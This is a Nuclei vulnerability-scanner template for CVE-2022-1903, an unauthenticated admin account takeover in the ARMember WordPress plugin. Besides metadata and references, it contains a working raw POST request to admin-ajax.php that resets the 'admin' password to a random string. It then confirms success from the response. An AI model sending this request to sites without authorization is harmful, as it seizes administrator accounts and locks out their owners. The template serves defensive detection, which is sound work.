nuclei-templates/http/cves/2022/CVE-2022-1903.yaml

58 lines
2.1 KiB
YAML
Raw Normal View History

2023-04-21 08:56:01 +00:00
id: CVE-2022-1903
info:
name: ARMember < 3.4.8 - Unauthenticated Admin Account Takeover
author: theamanrawat
severity: high
description: |
The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can gain unauthorized access to the admin account, potentially leading to further compromise of the system.
2023-09-06 11:59:08 +00:00
remediation: Fixed in version 3.4.8
2023-04-21 08:56:01 +00:00
reference:
- https://wpscan.com/vulnerability/28d26aa6-a8db-4c20-9ec7-39821c606a08
- https://wordpress.org/plugins/armember-membership/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1903
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2022-1903
cwe-id: CWE-862
epss-score: 0.63489
epss-percentile: 0.97571
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:*
2023-04-21 08:56:01 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: armemberplugin
product: armember
2023-09-06 11:59:08 +00:00
framework: wordpress
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,account-takeover,wpscan,wordpress,wp-plugin,wp,armember-membership,unauthenticated,armemberplugin
2023-04-21 08:56:01 +00:00
http:
2023-04-21 08:56:01 +00:00
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=arm_shortcode_form_ajax_action&user_pass={{randstr}}&repeat_pass={{randstr}}&arm_action=change-password&key2=x&action2=rp&login2=admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Your Password has been reset"
- "arm_success_msg"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4b0a00483046022100d16642eec0006bdb049e8fa943e55e89a4c13aee1cfd5cf044744430819c3a21022100d5d28e43c312f56d3af53a5a1da86ad739c110a564f53279e06d336922238593:922c64590222798bb761d5b6d8e72950